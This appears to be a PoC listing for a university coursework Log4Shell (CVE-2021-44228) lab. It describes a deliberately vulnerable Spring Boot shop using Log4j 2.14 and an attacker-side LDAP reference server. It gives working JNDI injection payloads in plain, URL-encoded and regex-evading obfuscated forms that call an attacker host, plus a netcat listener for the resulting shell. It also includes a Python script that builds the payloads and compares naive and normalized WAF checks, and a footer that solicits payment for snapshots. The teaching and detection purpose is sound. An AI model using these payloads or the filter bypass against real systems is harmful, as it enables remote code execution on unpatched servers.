Related vulnerability: CVE-2021-44228
Description
Proof of Concept (PoC) for the Log4Shell vulnerability (CVE-2021-44228), developed as part of the coursework for the curricular unit TPAS in the Master's degree in Information Security at FCUP.
Introduction
# TPAS Log4Shell PoC
This repository contains the PoC described above. It features:
- A React SPA frontend that simulates a generic e-commerce website with basic features such as browsing products and viewing details such as description, price and rating, backed by the DummyJSON products API (https://dummyjson.com/docs/products).
- A Spring Boot REST API backend that uses a vulnerable version of Log4j (2.14).
- A bash script, `init.sh`, that sets up most of the attacker side needed to exploit Log4Shell (see `ldap-ref-server/` and `jndi-classes/` in the file snapshot below).
To run this stack you need to:
- On the target host:
  - Install Docker
  - Replace `<target_ip>` in the `NEXT_PUBLIC_BACKEND_URL` environment variable in `docker-compose.yaml`
  - Run `docker-compose up`
- On the attacker host:
  - Install Java, Python and Maven
  - Open the required ports; run `./init.sh --help` to see which ports are used and what the script does
  - Run `init.sh`
  - Run a netcat listener: `nc -lvnp <port>`
Once everything is running:
Place this payload in the search bar (URL-encoded, since it is sent as a GET query parameter):
```
%24%7Bjndi%3Aldap%3A%2F%2F<attacker_host_ip>%3A<ldap_port>%2FExploit%7D
```
Or place this payload in a request header (for example, intercept a request with Burp Suite and modify it):
```
${jndi:ldap://<attacker_host_ip>:<ldap_port>/Exploit}
```
On the website, there is an icon next to the user's name that toggles whether the logged string is sanitized with the regular expression `\$\{jndi:.*?}` (written as the Java string literal `"\\$\\{jndi:.*?}"`). By default sanitization is disabled, shown by a red demon icon; when it is enabled the icon changes to a green smiley face.
This toggle can be used to simulate a WAF and its bypass; more regular expressions can be added to the backend's LoggerManager.java class.
Here is a payload that the current regex does not match:
```
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://<attacker_host_ip>:<ldap_port>/Exploit}
```
It evades the filter because Log4j resolves nested lookups inner-first: `${::-j}` is a lookup with an empty name and the default value `j`, so the letters of `jndi` and `ldap` only appear after substitution, inside Log4j, while the regex is applied to the raw string before any lookup runs.
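As an added example (not code from the TPAS repository), the following Python script builds the three payload forms shown above and runs the PoC's sanitizer regex over each, once against the raw string as the PoC does and once after percent-decoding and unfolding Log4j's `${name:-default}` lookups. The attacker IP, port and sample values are constructed; `unfold_lookups` is an assumed emulation of Log4j's substitution (it treats every lookup as unresolvable, so it only handles the default-value form) and goes beyond the single `${::-x}` payload in the README by also collapsing forms such as `${env:NOPE:-j}`.

```python
import re
from urllib.parse import quote, unquote

# Assumed attacker-side values; the README leaves them as <attacker_host_ip>
# and <ldap_port>.  Everything below is constructed for this example.
ATTACKER_HOST = "10.0.0.5"
LDAP_PORT = 1389


def jndi_payload(host: str, port: int, cls: str = "Exploit") -> str:
    """Plain lookup string, as placed in a request header."""
    return f"${{jndi:ldap://{host}:{port}/{cls}}}"


def url_encoded_payload(host: str, port: int, cls: str = "Exploit") -> str:
    """Same string percent-encoded for a GET query parameter (safe="" so
    ':' and '/' are encoded too, matching the README's search-bar form)."""
    return quote(jndi_payload(host, port, cls), safe="")


def obfuscated_payload(host: str, port: int, cls: str = "Exploit") -> str:
    """Spell 'jndi' and 'ldap' with ${::-x} default-value lookups so the
    literal text '${jndi:' never appears in the raw string."""
    def spell(word: str) -> str:
        return "".join(f"${{::-{c}}}" for c in word)
    return f"${{{spell('jndi')}:{spell('ldap')}://{host}:{port}/{cls}}}"


# The PoC's sanitizer pattern: Java literal "\\$\\{jndi:.*?}" is the regex \$\{jndi:.*?}
NAIVE_JNDI = re.compile(r"\$\{jndi:.*?}")

# Innermost ${name:-default} containing no nested ${...}; group(2) is the default.
DEFAULT_LOOKUP = re.compile(r"\$\{([^${}]*?):-([^${}]*)\}")


def unfold_lookups(value: str, max_rounds: int = 32) -> str:
    """Emulate how Log4j's StrSubstitutor treats lookups it cannot resolve:
    each innermost ${name:-default} collapses to its default, inner first,
    until the string stops changing.  Assumption: every lookup is treated as
    unresolvable (real Log4j would also resolve env:, sys:, lower:, ...),
    which is the conservative choice for detection."""
    for _ in range(max_rounds):
        unfolded = DEFAULT_LOOKUP.sub(lambda m: m.group(2), value)
        if unfolded == value:
            break
        value = unfolded
    return value


def naive_is_blocked(value: str) -> bool:
    """What the PoC's regex sees: the raw logged string."""
    return bool(NAIVE_JNDI.search(value))


def normalized_is_blocked(value: str) -> bool:
    """Decode percent-encoding (query parameters arrive encoded on the wire),
    unfold nested lookups, then apply the same regex."""
    return bool(NAIVE_JNDI.search(unfold_lookups(unquote(value))))


def scan(values: dict[str, str]) -> dict[str, tuple[bool, bool]]:
    """Return {label: (naive_blocked, normalized_blocked)} for each value."""
    return {k: (naive_is_blocked(v), normalized_is_blocked(v)) for k, v in values.items()}


# Constructed inputs: the string each delivery path would hand to the logger
# (the query-parameter case is shown as it appears in the raw request line).
SAMPLES = {
    "benign search": "laptop",
    "header, plain": jndi_payload(ATTACKER_HOST, LDAP_PORT),
    "query, url-encoded": url_encoded_payload(ATTACKER_HOST, LDAP_PORT),
    "header, obfuscated": obfuscated_payload(ATTACKER_HOST, LDAP_PORT),
}

if __name__ == "__main__":
    for label, (naive, normalized) in scan(SAMPLES).items():
        print(f"{label:22} naive={naive!s:5} normalized={normalized!s:5}")
```

The naive check only catches the plain header form; the obfuscated payload and the still-encoded query string pass it, while the normalized check flags all three. Matching after decoding and unfolding is what a useful WAF rule has to do, and it is also why the only real fix is upgrading Log4j rather than filtering strings.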
File snapshot
```
[4.0K] /data/pocs/96cd38d01f57960b9518530ec7b5b3414d36357b
├── [4.0K] backend
│   ├── [ 293] Dockerfile
│   ├── [ 10K] mvnw
│   ├── [6.8K] mvnw.cmd
│   ├── [1.8K] pom.xml
│   ├── [ 326] README.md
│   └── [4.0K] src
│       └── [4.0K] main
│           ├── [4.0K] java
│           │   └── [4.0K] tpas
│           │       └── [4.0K] poc
│           │           └── [4.0K] log4shell
│           │               ├── [4.0K] components
│           │               │   ├── [1.1K] LoggerManager.java
│           │               │   └── [4.0K] LoggingWebFilter.java
│           │               ├── [4.0K] configs
│           │               │   └── [ 667] CorsConfig.java
│           │               ├── [4.0K] controllers
│           │               │   ├── [1.2K] LoggerController.java
│           │               │   └── [1.7K] ProductController.java
│           │               ├── [4.0K] dtos
│           │               │   ├── [ 353] Dimensions.java
│           │               │   ├── [ 444] Meta.java
│           │               │   ├── [2.0K] Product.java
│           │               │   ├── [ 320] ProductsDTO.java
│           │               │   └── [ 534] Review.java
│           │               ├── [ 782] Entrypoint.java
│           │               └── [4.0K] services
│           │                   └── [2.4K] ProductService.java
│           └── [4.0K] resources
│               ├── [ 104] application.properties
│               └── [ 623] log4j2.xml
├── [ 527] docker-compose.yaml
├── [4.0K] frontend
│   ├── [ 423] components.json
│   ├── [ 352] Dockerfile
│   ├── [ 471] next.config.mjs
│   ├── [ 175] nginx.conf
│   ├── [ 918] package.json
│   ├── [183K] package-lock.json
│   ├── [ 135] postcss.config.mjs
│   ├── [4.0K] public
│   │   ├── [ 25K] favicon.ico
│   │   └── [ 376] mat-icon-search.svg
│   ├── [ 311] README.md
│   ├── [4.0K] src
│   │   ├── [4.0K] components
│   │   │   ├── [4.0K] layout
│   │   │   │   ├── [1.5K] Header.tsx
│   │   │   │   └── [2.0K] Navbar.tsx
│   │   │   ├── [ 572] Layout.tsx
│   │   │   ├── [4.0K] product
│   │   │   │   ├── [2.7K] Categories.ts
│   │   │   │   ├── [3.7K] ProductCatalog.tsx
│   │   │   │   └── [5.6K] ProductModal.tsx
│   │   │   └── [4.0K] ui
│   │   │       ├── [1.1K] badge.tsx
│   │   │       ├── [1.0K] blurEffectImage.tsx
│   │   │       ├── [1.8K] button.tsx
│   │   │       ├── [1.8K] card.tsx
│   │   │       └── [1.1K] expandableSearch.tsx
│   │   ├── [4.0K] hooks
│   │   │   ├── [2.5K] productsResponseExample.json
│   │   │   ├── [2.2K] useExploitMode.tsx
│   │   │   └── [2.6K] useProducts.tsx
│   │   ├── [4.0K] interfaces
│   │   │   └── [ 872] Product.ts
│   │   ├── [4.0K] lib
│   │   │   └── [ 166] utils.ts
│   │   ├── [4.0K] pages
│   │   │   ├── [ 181] _app.tsx
│   │   │   ├── [ 257] _document.tsx
│   │   │   └── [ 234] index.tsx
│   │   ├── [4.0K] stores
│   │   │   └── [ 786] useProductStore.ts
│   │   └── [4.0K] styles
│   │       └── [2.5K] globals.css
│   ├── [1.6K] tailwind.config.ts
│   └── [ 596] tsconfig.json
├── [3.6K] init.sh
├── [4.0K] jndi-classes
├── [4.0K] ldap-ref-server
│   ├── [1.4K] pom.xml
│   ├── [ 366] README.md
│   └── [4.0K] src
│       └── [4.0K] main
│           └── [4.0K] java
│               └── [4.0K] tpas
│                   └── [4.0K] poc
│                       └── [4.0K] log4shell
│                           └── [4.3K] LDAPRefServer.java
├── [1.0K] LICENSE
└── [2.1K] README.md

34 directories, 59 files
```
Notes
1. Accessing the original source first is recommended.
2. If the source is unavailable or cannot be reached, email f.jinxu#gmail.com (replace # with @) to request the local snapshot.
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC.